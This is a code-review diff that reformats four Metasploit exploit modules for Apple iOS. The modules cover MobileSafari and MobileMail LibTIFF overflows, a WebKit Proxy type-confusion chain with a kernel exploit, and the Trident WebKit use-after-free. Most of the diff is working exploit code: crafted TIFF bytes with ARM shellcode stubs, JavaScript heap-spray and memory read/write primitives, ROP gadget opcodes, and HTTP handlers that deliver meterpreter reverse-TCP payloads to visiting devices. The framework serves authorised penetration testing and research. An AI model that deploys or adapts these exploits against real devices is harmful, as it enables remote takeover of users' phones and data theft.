### PR TITLE
modules/exploits/apple_ios: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/apple_ios/browser/safari_libtiff.rb
+++ b/modules/exploits/apple_ios/browser/safari_libtiff.rb
@@ -12,71 +12,74 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Apple iOS MobileSafari LibTIFF Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Apple iOS MobileSafari LibTIFF Buffer Overflow',
+        'Description' => %q{
           This module exploits a buffer overflow in the version of
-        libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
-        1.1.1 of the Apple iPhone. iPhones which have not had the BSD
-        tools installed will need to use a special payload.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>  ['hdm', 'kf'],
-      'References'     =>
-        [
+          libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
+          1.1.1 of the Apple iPhone. iPhones which have not had the BSD
+          tools installed will need to use a special payload.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['hdm', 'kf'],
+        'References' => [
           ['CVE', '2006-3459'],
           ['OSVDB', '27723'],
           ['BID', '19283']
         ],
-      'Payload'        =>
-        {
-          'Space'    => 1800,
-          'BadChars' => "",
+        'Payload' => {
+          'Space' => 1800,
+          'BadChars' => '',
 
           # Multi-threaded applications are not allowed to execve() on OS X
           # This stub injects a vfork/exit in front of the payload
-          'Prepend'  =>
-            [
-              0xe3a0c042, # vfork
-              0xef000080, # sc
-              0xe3500000, # cmp r0, #0
-              0x1a000001, # bne
-              0xe3a0c001, # exit(0)
-              0xef000080  # sc
-            ].pack("V*")
+          'Prepend' =>
+              [
+                0xe3a0c042, # vfork
+                0xef000080, # sc
+                0xe3500000, # cmp r0, #0
+                0x1a000001, # bne
+                0xe3a0c001, # exit(0)
+                0xef000080  # sc
+              ].pack('V*')
         },
-      'Arch'           => ARCH_ARMLE,
-      'Platform'       => %w{ osx },
-      'Targets'        =>
-        [
-
-          [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
+        'Arch' => ARCH_ARMLE,
+        'Platform' => %w[osx],
+        'Targets' => [
+          [
+            'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
             {
               'Platform' => 'osx',
 
               # Scratch space for our shellcode and stack
-              'Heap'     => 0x00802000,
+              'Heap' => 0x00802000,
 
               # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
-              'Magic'    => 0x300d562c,
+              'Magic' => 0x300d562c
             }
           ],
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2006-08-01'
-      ))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2006-08-01',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ UNRELIABLE_SESSION ]
+        }
+      )
+    )
   end
 
-  def on_request_uri(cli, req)
-
-
+  def on_request_uri(cli, _req)
     # Re-generate the payload
-    return if ((p = regenerate_payload(cli)) == nil)
+    return if (p = regenerate_payload(cli)).nil?
 
     # Grab reference to the target
     t = target
 
-    print_status("Sending exploit")
+    print_status('Sending exploit')
 
     # Transmit the compressed response to the client
     send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })
@@ -85,8 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
     handler(cli)
   end
 
-  def generate_tiff(code, targ)
-
+  def generate_tiff(_code, targ)
     #
     # This is a TIFF file, we have a huge range of evasion
     # capabilities, but for now, we don't use them.
@@ -94,35 +96,34 @@ class MetasploitModule < Msf::Exploit::Remote
     #
 
     lolz = 2048
-    tiff =
-      "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
-      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
-      "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
-      "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+
-      "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+
-      "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+
-      "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+
-      "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
-      "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
-      "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
-      [lolz].pack("V") +
-      "\x84\x00\x00\x00\x00\x00\x00\x00"
+    tiff = "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"
+    tiff << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    tiff << "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"
+    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"
+    tiff << "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"
+    tiff << "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"
+    tiff << [lolz].pack('V')
+    tiff << "\x84\x00\x00\x00\x00\x00\x00\x00"
 
     # Randomize the bajeezus out of our data
     hehe = rand_text(lolz)
 
     # Were going to candy mountain!
-    hehe[120, 4] = [targ['Magic']].pack("V")
+    hehe[120, 4] = [targ['Magic']].pack('V')
 
     # >> add r0, r4, #0x30
-    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
+    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack('V')
 
     # Candy mountain, Charlie!
     # >> mov r1, sp
 
     # It will be an adventure!
     # >> mov r2, r8
-    hehe[ 92, 4] = [ hehe.length ].pack("V")
+    hehe[92, 4] = [ hehe.length ].pack('V')
 
     # Its a magic leoplurodon!
     # It has spoken!
@@ -147,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # We made it to candy mountain!
     # Go inside Charlie!
     # sub sp, r7, #0x14
-    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
+    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack('V')
 
     # Goodbye Charlie!
     # ;; targ['Heap'] + 0x48 becomes the stack pointer
@@ -157,7 +158,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # >> ldmia sp!, {r4, r5, r6, r7, pc}
 
     # Return back to the copied heap data
-    hehe[192, 4] = [  targ['Heap'] + 196  ].pack("V")
+    hehe[192, 4] = [ targ['Heap'] + 196 ].pack('V')
 
     # Insert our actual shellcode at heap location + 196
     hehe[196, payload.encoded.length] = payload.encoded

--- a/modules/exploits/apple_ios/browser/webkit_createthis.rb
+++ b/modules/exploits/apple_ios/browser/webkit_createthis.rb
@@ -11,38 +11,40 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Safari Webkit Proxy Object Type Confusion',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Safari Webkit Proxy Object Type Confusion',
+        'Description' => %q{
           This module exploits a type confusion bug in the Javascript Proxy object in
-        WebKit. The DFG JIT does not take into account that, through the use of a Proxy,
-        it is possible to run arbitrary JS code during the execution of a CreateThis
-        operation. This makes it possible to change the structure of e.g. an argument
-        without causing a bailout, leading to a type confusion (CVE-2018-4233).
+          WebKit. The DFG JIT does not take into account that, through the use of a Proxy,
+          it is possible to run arbitrary JS code during the execution of a CreateThis
+          operation. This makes it possible to change the structure of e.g. an argument
+          without causing a bailout, leading to a type confusion (CVE-2018-4233).
 
           The type confusion leads to the ability to allocate fake Javascript objects,
-        as well as the ability to find the address in memory of a Javascript object.
-        This allows us to construct a fake JSCell object that can be used to read
-        and write arbitrary memory from Javascript.  The module then uses a ROP chain
-        to write the first stage shellcode into executable memory within the Safari
-        process and kick off its execution.
+          as well as the ability to find the address in memory of a Javascript object.
+          This allows us to construct a fake JSCell object that can be used to read
+          and write arbitrary memory from Javascript.  The module then uses a ROP chain
+          to write the first stage shellcode into executable memory within the Safari
+          process and kick off its execution.
 
           The first stage maps the second stage macho (containing CVE-2017-13861) into
-        executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake
-        exploit leads to a kernel task port (TFP0) that can read and write arbitrary
-        kernel memory. The processes credential and sandbox structure in the kernel
-        is overwritten and the meterpreter payloads code signature hash is added to
-        the kernels trust cache, allowing Safari to load and execute the (self-signed)
-        meterpreter payload.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [
-        'saelo',
-        'niklasb',
-        'Ian Beer',
-        'siguza',
+          executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake
+          exploit leads to a kernel task port (TFP0) that can read and write arbitrary
+          kernel memory. The processes credential and sandbox structure in the kernel
+          is overwritten and the meterpreter payloads code signature hash is added to
+          the kernels trust cache, allowing Safari to load and execute the (self-signed)
+          meterpreter payload.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'saelo',
+          'niklasb',
+          'Ian Beer',
+          'siguza',
         ],
-      'References'     => [
+        'References' => [
           ['CVE', '2018-4233'],
           ['CVE', '2017-13861'],
           ['URL', 'https://github.com/saelo/cve-2018-4233'],
@@ -50,63 +52,40 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],
           ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],
         ],
-      'Arch'           => ARCH_AARCH64,
-      'Platform'       => 'apple_ios',
-      'DefaultTarget'  => 0,
-      'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },
-      'Targets'        => [[ 'Automatic', {} ]],
-      'DisclosureDate' => '2018-03-15'))
+        'Arch' => ARCH_AARCH64,
+        'Platform' => 'apple_ios',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },
+        'Targets' => [[ 'Automatic', {} ]],
+        'DisclosureDate' => '2018-03-15',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ UNRELIABLE_SESSION ]
+        }
+      )
+    )
     register_advanced_options([
-      OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information in the exploit javascript", false]),
-      OptBool.new('DUMP_OFFSETS', [false, "Show newly found offsets in a javascript prompt", false]),
+      OptBool.new('DEBUG_EXPLOIT', [false, 'Show debug information in the exploit JavaScript', false]),
+      OptBool.new('DUMP_OFFSETS', [false, 'Show newly found offsets in a JavaScript prompt', false]),
     ])
   end
 
   def payload_url
-    "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
+    "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
   end
 
   def get_version(user_agent)
     if user_agent =~ /OS (.*?) like Mac OS X\)/
-      ios_version = Rex::Version.new($1.gsub("_", "."))
+      ios_version = Rex::Version.new(::Regexp.last_match(1).gsub('_', '.'))
       return ios_version
     end
-    fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+
+    fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
   end
 
-  def on_request_uri(cli, request)
-    if request.uri =~ %r{/apple-touch-icon*}
-      return
-    elsif request.uri =~ %r{/favicon*}
-      return
-    elsif request.uri =~ %r{/payload10$*}
-      payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1
-      send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})
-      print_good("Sent sha1 iOS 10 payload")
-      return
-    elsif request.uri =~ %r{/payload11$*}
-      payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib
-      send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})
-      print_good("Sent sha256 iOS 11 payload")
-      return
-    end
-
-    user_agent = request['User-Agent']
-    print_status("Requesting #{request.uri} from #{user_agent}")
-    version = get_version(user_agent)
-    ios_11 = (version >= Rex::Version.new('11.0.0'))
-    if request.uri =~ %r{/exploit$}
-      loader_data = exploit_data('CVE-2017-13861', 'exploit')
-      srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)
-      config = [srvhost, srvport].pack("Nn") + payload_url
-      payload_url_index = loader_data.index('PAYLOAD_URL')
-      loader_data[payload_url_index, config.length] = config
-      print_good("Sent async_wake exploit")
-      send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
-      return
-    end
-
-    get_mem_rw_ios_10 = %Q^
+  def get_mem_rw_ios_10
+    %^
 function get_mem_rw(stage1) {
     var structs = [];
     function sprayStructures() {
@@ -163,8 +142,10 @@ function get_mem_rw(stage1) {
     return memory;
 }
 ^
+  end
 
-    get_mem_rw_ios_11 = %Q^
+  def get_mem_rw_ios_11
+    %^
 function get_mem_rw(stage1) {
     var FPO = typeof(SharedArrayBuffer) === 'undefined' ? 0x18 : 0x10;
     var structure_spray = []
@@ -298,13 +279,44 @@ function get_mem_rw(stage1) {
     return stage2;
 }
 ^
+  end
 
-    get_mem_rw = (version >= Rex::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10
-    utils = exploit_data "javascript_utils", "utils.js"
-    int64 = exploit_data "javascript_utils", "int64.js"
+  # rubocop:disable Metrics/MethodLength
+  def on_request_uri(cli, request)
+    return if request.uri =~ %r{/apple-touch-icon*}
+    return if request.uri =~ %r{/favicon*}
+
+    if request.uri =~ %r{/payload10$*}
+      payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1
+      send_response(cli, payload_data, { 'Content-Type' => 'application/octet-stream' })
+      print_good('Sent sha1 iOS 10 payload')
+      return
+    end
+
+    if request.uri =~ %r{/payload11$*}
+      payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib
+      send_response(cli, payload_data, { 'Content-Type' => 'application/octet-stream' })
+      print_good('Sent sha256 iOS 11 payload')
+      return
+    end
+
+    user_agent = request['User-Agent']
+    print_status("Requesting #{request.uri} from #{user_agent}")
+
+    if request.uri =~ %r{/exploit$}
+      loader_data = exploit_data('CVE-2017-13861', 'exploit')
+      srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)
+      config = [srvhost, srvport].pack('Nn') + payload_url
+      payload_url_index = loader_data.index('PAYLOAD_URL')
+      loader_data[payload_url_index, config.length] = config
+      print_good('Sent async_wake exploit')
+      send_response(cli, loader_data, { 'Content-Type' => 'application/octet-stream' })
+      return
+    end
+
     dump_offsets = ''
     if datastore['DUMP_OFFSETS']
-      dump_offsets = %Q^
+      dump_offsets = %^
         var offsetstr = uuid + " : { ";
         var offsetarray = [ "_dlsym", "_dlopen", "__longjmp", "regloader", "dispatch", "stackloader", "movx4", "ldrx8", "_mach_task_self_", "__kernelrpc_mach_vm_protect_trap", "__platform_memmove",
         "__ZN3JSC30endOfFixedExecutableMemoryPoolE", "__ZN3JSC29jitWriteSeparateHeapsFunctionE", "__ZN3JSC32startOfFixedExecutableMemoryPoolE", ];
@@ -320,7 +332,15 @@ function get_mem_rw(stage1) {
 ^
     end
 
-    html = %Q^
+    version = get_version(user_agent)
+    ios_11 = (version >= Rex::Version.new('11.0.0'))
+
+    get_mem_rw = (version >= Rex::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10
+
+    utils = exploit_data('javascript_utils', 'utils.js')
+    int64 = exploit_data('javascript_utils', 'int64.js')
+
+    html = %^
 <html>
 <body>
 <script>
@@ -405,7 +425,7 @@ function pwn() {
     stage1.test();
 
     var stage2 = get_mem_rw(stage1);
-    var FPO = #{ios_11 ? "(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;" : "0x18;"}
+    var FPO = #{ios_11 ? "(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;" : '0x18;'}
     var memory = stage2;
     memory.u32 = _u32;
 
@@ -493,17 +513,22 @@ function pwn() {
         var libs =
         {
             "/usr/lib/system/libdyld.dylib":                                        ["_dlsym", "_dlopen"],
-            #{ ios_11 ? '
+            #{ if ios_11
+                 '
             "/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore":   ["__ZN3JSC29jitWriteSeparateHeapsFunctionE"],
             "/usr/lib/system/libsystem_platform.dylib":                             ["__longjmp"],
-            ' : '
+            '
+               else
+                 '
             "/usr/lib/system/libsystem_platform.dylib":                             ["__longjmp", "__platform_memmove"],
             "/usr/lib/system/libsystem_kernel.dylib":                               ["_mach_task_self_", "__kernelrpc_mach_vm_protect_trap"],
             "/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore":   ["__ZN3JSC30endOfFixedExecutableMemoryPoolE"],
-            '}
+            '
+               end}
         }
 
-        #{ ios_11 ? '
+        #{ if ios_11
+             '
         var opcodes = {
             // ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret
             "ldrx8":     [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ],
@@ -522,7 +547,9 @@ function pwn() {
             "/usr/lib/libc++.1.dylib",  // ldrx8, regloader, movx4, stackloader
         ];
 
-        ' : '
+        '
+           else
+             '
         var opcodes = {
             // mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28
             "regloader": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ],
@@ -543,7 +570,8 @@ function pwn() {
         };
 
         var opcode_libs = [ "/usr/lib/libLLVM.dylib" ];
-        '}
+        '
+           end}
 
         var imgs  = Add(hdr, memory.u32(Add(hdr, 0x18)));
         var nimgs = memory.u32(Add(hdr, 0x1c));
@@ -693,10 +721,12 @@ function pwn() {
         if (offsets["__ZN3JSC30endOfFixedExecutableMemoryPoolE"] == null && offsets["__ZN3JSC29jitWriteSeparateHeapsFunctionE"] != null) {
             offsets["__ZN3JSC30endOfFixedExecutableMemoryPoolE"] = Sub(offsets["__ZN3JSC29jitWriteSeparateHeapsFunctionE"], 8);
         }
-        #{ ios_11 ? '
+        #{ if ios_11
+             '
         if (offsets["__ZN3JSC32startOfFixedExecutableMemoryPoolE"] == null && offsets["__ZN3JSC30endOfFixedExecutableMemoryPoolE"] != null) {
             offsets["__ZN3JSC32startOfFixedExecutableMemoryPoolE"] = Sub(offsets["__ZN3JSC30endOfFixedExecutableMemoryPoolE"], 8);
-        }' : ''}
+        }'
+           end}
 
 #{dump_offsets}
 
@@ -943,7 +973,8 @@ function pwn() {
         )
     }
 
-    #{ios_11 ? '
+    #{if ios_11
+        '
     if (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) {
         add_call(jitWriteSeparateHeaps
             , Sub(codeAddr, memPoolStart)     // off
@@ -953,7 +984,9 @@ function pwn() {
     } else {
         fail("jitWrite");
     }
-    ' : '
+    '
+      else
+        '
     add_call(mach_vm_protect,
         mach_task_self_,    // task
         codeAddr,           // addr
@@ -967,7 +1000,8 @@ function pwn() {
         paddr,              // src
         shsz                // size
     );
-    '}
+    '
+      end}
 
     add_call(codeAddr,
         dlopen,
@@ -1023,11 +1057,13 @@ go();
 </body>
 </html>
     ^
+
     unless datastore['DEBUG_EXPLOIT']
-      html.gsub!(/\/\/.*$/, '') # strip comments
+      html.gsub!(%r{//.*$}, '') # strip comments
       html.gsub!(/^\s*print\s*\(.*?\);\s*$/, '') # strip print(*);
     end
-    send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
-  end
 
+    send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
+  end
+  # rubocop:enable Metrics/MethodLength
 end

--- a/modules/exploits/apple_ios/browser/webkit_trident.rb
+++ b/modules/exploits/apple_ios/browser/webkit_trident.rb
@@ -9,20 +9,22 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'WebKit not_number defineProperties UAF',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'WebKit not_number defineProperties UAF',
+        'Description' => %q{
           This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [
-        'qwertyoruiop', # jbme.qwertyoruiop.com
-        'siguza',       # PhoenixNonce
-        'tihmstar',     # PhoenixNonce
-        'benjamin-42',  # Trident
-        'timwr',        # metasploit integration
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'qwertyoruiop', # jbme.qwertyoruiop.com
+          'siguza',       # PhoenixNonce
+          'tihmstar',     # PhoenixNonce
+          'benjamin-42',  # Trident
+          'timwr',        # metasploit integration
         ],
-      'References'     => [
+        'References' => [
           ['CVE', '2016-4655'],
           ['CVE', '2016-4656'],
           ['CVE', '2016-4657'],
@@ -38,56 +40,66 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/benjamin-42/Trident'],
           ['URL', 'http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html'],
         ],
-      'Arch'           => ARCH_AARCH64,
-      'Platform'       => 'apple_ios',
-      'DefaultTarget'  => 0,
-      'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },
-      'Targets'        => [[ 'Automatic', {} ]],
-      'DisclosureDate' => '2016-08-25'))
+        'Arch' => ARCH_AARCH64,
+        'Platform' => 'apple_ios',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },
+        'Targets' => [[ 'Automatic', {} ]],
+        'DisclosureDate' => '2016-08-25',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ UNRELIABLE_SESSION ]
+        }
+      )
+    )
     register_options(
       [
-        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]),
-        OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])
-      ])
+        OptPort.new('SRVPORT', [ true, 'The local port to listen on.', 8080 ]),
+        OptString.new('URIPATH', [ true, 'The URI to use for this exploit.', '/' ])
+      ]
+    )
   end
 
   def payload_url
-    "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
+    "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
   end
 
   def on_request_uri(cli, request)
     print_status("Request from #{request['User-Agent']}")
+
     if request.uri =~ %r{/loader32$}
-      print_good("armle target is vulnerable.")
-      local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit32" )
+      print_good('armle target is vulnerable.')
+      local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4655', 'exploit32')
       loader_data = File.read(local_file, mode: 'rb')
       srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)
-      config = [srvhost, srvport].pack("Nn") + payload_url
+      config = [srvhost, srvport].pack('Nn') + payload_url
       payload_url_index = loader_data.index('PAYLOAD_URL')
       loader_data[payload_url_index, config.length] = config
-      send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
+      send_response(cli, loader_data, { 'Content-Type' => 'application/octet-stream' })
       return
     elsif request.uri =~ %r{/loader64$}
-      print_good("aarch64 target is vulnerable.")
-      local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" )
+      print_good('aarch64 target is vulnerable.')
+      local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4655', 'loader')
       loader_data = File.read(local_file, mode: 'rb')
-      send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
+      send_response(cli, loader_data, { 'Content-Type' => 'application/octet-stream' })
       return
     elsif request.uri =~ %r{/exploit64$}
-      local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" )
+      local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4655', 'exploit')
       loader_data = File.read(local_file, mode: 'rb')
       payload_url_index = loader_data.index('PAYLOAD_URL')
       loader_data[payload_url_index, payload_url.length] = payload_url
-      send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
+      send_response(cli, loader_data, { 'Content-Type' => 'application/octet-stream' })
       print_status("Sent exploit (#{loader_data.size} bytes)")
       return
     elsif request.uri =~ %r{/payload32$}
       payload_data = MetasploitPayloads::Mettle.new('arm-iphone-darwin').to_binary :dylib_sha1
-      send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})
+      send_response(cli, payload_data, { 'Content-Type' => 'application/octet-stream' })
       print_status("Sent payload (#{payload_data.size} bytes)")
       return
     end
-    html = %Q^
+
+    html = %^
 <html>
 <body>
 <script>
@@ -360,7 +372,6 @@ setTimeout(go_, 300);
 </body>
 </html>
     ^
-    send_response(cli, html, {'Content-Type'=>'text/html'})
+    send_response(cli, html, { 'Content-Type' => 'text/html' })
   end
-
 end

--- a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb
+++ b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb
@@ -12,53 +12,56 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::SMTPDeliver
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Apple iOS MobileMail LibTIFF Buffer Overflow',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Apple iOS MobileMail LibTIFF Buffer Overflow',
+        'Description' => %q{
           This module exploits a buffer overflow in the version of
-        libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
-        1.1.1 of the Apple iPhone. iPhones which have not had the BSD
-        tools installed will need to use a special payload.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>  ['hdm', 'kf'],
-      'References'     =>
-        [
+          libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
+          1.1.1 of the Apple iPhone. iPhones which have not had the BSD
+          tools installed will need to use a special payload.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['hdm', 'kf'],
+        'References' => [
           ['CVE', '2006-3459'],
           ['OSVDB', '27723'],
           ['BID', '19283']
         ],
-      'Stance'         => Msf::Exploit::Stance::Passive,
-      'Payload'        =>
-        {
-          'Space'    => 1800,
-          'BadChars' => "",
-          'Compat'   =>
-            {
-              'ConnectionType' => '-bind -find',
-            },
+        'Stance' => Msf::Exploit::Stance::Passive,
+        'Payload' => {
+          'Space' => 1800,
+          'BadChars' => '',
+          'Compat' => {
+            'ConnectionType' => '-bind -find'
+          }
         },
-      'Arch'           => ARCH_ARMLE,
-      'Platform'       => %w{ osx },
-      'Targets'        =>
-        [
-
-          [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
+        'Arch' => ARCH_ARMLE,
+        'Platform' => %w[osx],
+        'Targets' => [
+          [
+            'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
             {
               'Platform' => 'osx',
 
               # Scratch space for our shellcode and stack
-              'Heap'     => 0x00802000,
+              'Heap' => 0x00802000,
 
               # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
-              'Magic'    => 0x300d562c,
+              'Magic' => 0x300d562c
             }
           ],
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2006-08-01'
-      ))
-
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2006-08-01',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ UNRELIABLE_SESSION ]
+        }
+      )
+    )
   end
 
   def autofilter
@@ -66,26 +69,24 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-
     exts = ['jpg', 'tiff', 'tif']
 
-    gext =  exts[rand(exts.length)]
-    name = rand_text_alpha(rand(10)+1) + ".#{gext}"
-    data = Rex::Text.rand_text_alpha(rand(32)+1)
+    gext = exts[rand(exts.length)]
+    data = Rex::Text.rand_text_alpha(1..32)
     tiff = generate_tiff(target)
 
     msg = Rex::MIME::Message.new
     msg.mime_defaults
-    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
+    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(1..32)
     msg.to = datastore['MAILTO']
     msg.from = datastore['MAILFROM']
 
-    msg.add_part(Rex::Text.encode_base64(data, "\r\n"), "text/plain", "base64", "inline")
-    msg.add_part_attachment(tiff, rand_text_alpha(rand(32)+1) + "." + gext)
+    msg.add_part(Rex::Text.encode_base64(data, "\r\n"), 'text/plain', 'base64', 'inline')
+    msg.add_part_attachment(tiff, rand_text_alpha(1..32) + '.' + gext)
 
     send_message(msg.to_s)
 
-    print_status("Waiting for a payload session (backgrounding)...")
+    print_status('Waiting for a payload session (backgrounding)...')
   end
 
   def generate_tiff(targ)
